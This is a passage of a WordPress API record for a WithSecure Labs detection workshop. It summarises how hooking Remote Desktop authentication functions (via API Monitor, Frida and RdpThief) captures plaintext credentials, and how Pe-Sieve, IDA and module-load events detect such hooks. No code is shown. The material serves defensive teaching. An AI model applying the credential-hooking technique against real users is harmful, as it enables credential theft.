We&#x27;ve seen an initial proof-of-concept of this, both manually within API Monitor, and subsequently in a similar way using Frida. Lastly, we looked at MDSec&#x27;s RdpThief, which operationalises the concepts we explored.<\/p>\n<p>From a detection perspective, we observed how hooks installed within DLLs can be detected due to Windows&#x27; &quot;copy-on-write&quot; mechanism, demonstrated by a scan from Pe-Sieve. We took this a step further and loaded one of the patched DLLs dumped by Pe-Sieve into IDA to identify the &quot;jmp&quot; instruction that transfers control to our hook.<\/p>\n<p>We also considered other implementations of the RDP authentication-hooking process, and how these could be picked up via module load events, or via the anomalous loading of the .NET CLR.<\/p>\n<p>Join us for our <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-2021-windows-lab-4\/\" target=\"_blank\" rel=\"noopener\">final lab<\/a> of the Windows workshop, as we explore cookie theft using Rich Warren&#x27;s <a href=\"https:\/\/github.com\/rxwx\/chlonium\" target=\"_blank\" rel=\"noopener\">Chlonium<\/a> project!<\/p>\n<\/div>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right wp-block-two-column-block__share wp-block-two-column-block__mobile-after-right\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a 
intelligence<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">DarkGate Rises: New version of DarkGate malware hunts like a Duck but bites like a RAT<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">Source: https:\/\/labs.withsecure.com\/publications\/darkgate-rises<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/darkgate-rises\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>                        <\/div>\n                                    <\/div>\n                <div class=\"wp-block-cards__nav fade-in\">\n                    <div class=\"wp-block-cards__pagination js-wp-block-cards-pagination\">\n                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-prev\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                    <div class=\"wp-block-cards__nav-arrow js-wp-block-cards-nav-next\">\n                        <svg class='edwp-icon edwp-icon--reg js-icon ' aria-hidden='true'>\n                <use xlink:href='#chevron'><\/use>\n            <\/svg>                    <\/div>\n                <\/div>\n            <\/div>\n                                    <\/div>\n<\/section>\n","protected":false},"excerpt":{"rendered":"<p>For this lab, we&#8217;ll turn the tables on the defensive use of API hooking and apply the same principles in an offensive post exploitation context. 
We&#8217;ll target a user authenticating to a host using Remote Desktop, and hook the functions that provide us with their plaintext credentials.<\/p>\n","protected":false},"author":3,"featured_media":8858,"template":"","categories":[240,231],"labs_content_type":[296],"class_list":["post-7751","lab_item","type-lab_item","status-publish","has-post-thumbnail","hentry","category-attack-detection","category-software-protection"],"acf":[],"card":"<div class=\"wp-component-card-insight js-card-link wp-component-card-insight--highlighted\">\n    <div class=\"wp-component-card-insight__image-wrapper\">\n        <img width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research.jpg\" class=\"wp-component-card-insight__image\" alt=\"\" decoding=\"async\" loading=\"lazy\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research.jpg 1200w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-300x200.jpg 300w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-1024x683.jpg 1024w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-768x512.jpg 768w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-447x298.jpg 447w, https:\/\/www.withsecure.com\/wp-content\/uploads\/2026\/05\/ws_labs_research-219x146.jpg 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                    <p class=\"wp-component-card-insight__content-type\">W\/Labs<\/p>\n            <\/div>\n    <div class=\"wp-component-card-insight__content\">\n                    <div class=\"wp-component-card-insight__meta\">\n                <div class=\"wp-component-card-insight__categories\">\n                                            <span class=\"wp-component-card-insight__category\">Attack Detection<\/span>\n                                            <span class=\"wp-component-card-insight__category\">Software 
Protection<\/span>\n                                    <\/div>\n            <\/div>\n                            <h3 class=\"wp-component-card-insight__title\">Attack Detection Fundamentals 2021: Windows &#8211; Lab #3<\/h3>\n                                            <p class=\"wp-component-card-insight__desc\">For this lab, we&#039;ll turn the tables on the defensive use of API hooking and apply the same principles in an offensive post exploitation context. We&#039;ll target a user authenticating to a host using Remote Desktop, and hook the functions that provide us with their plaintext credentials.<\/p>\n                            <div class=\"wp-component-card-insight__button-wrapper\">\n                <a class=\"wp-component-button btn btn--primary btn--dark wp-component-card-insight__button btn--small\" href=\"https:\/\/www.withsecure.com\/en\/resources-hub\/w-labs\/attack-detection-fundamentals-2021-windows-lab-3\/\">Read more<\/a>            <\/div>\n            <\/div>\n<\/div>","_links":{"self":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item\/7751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/lab_item"}],"about":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/types\/lab_item"}],"author":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/users\/3"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media\/8858"}],"wp:attachment":[{"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/media?parent=7751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/categories?post=7751"},{"taxonomy":"labs_content_type","embeddable":true,"href":"https:\/\/www.withsecure.com\/en\/wp-json\/wp\/v2\/labs_content_type?post=7751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}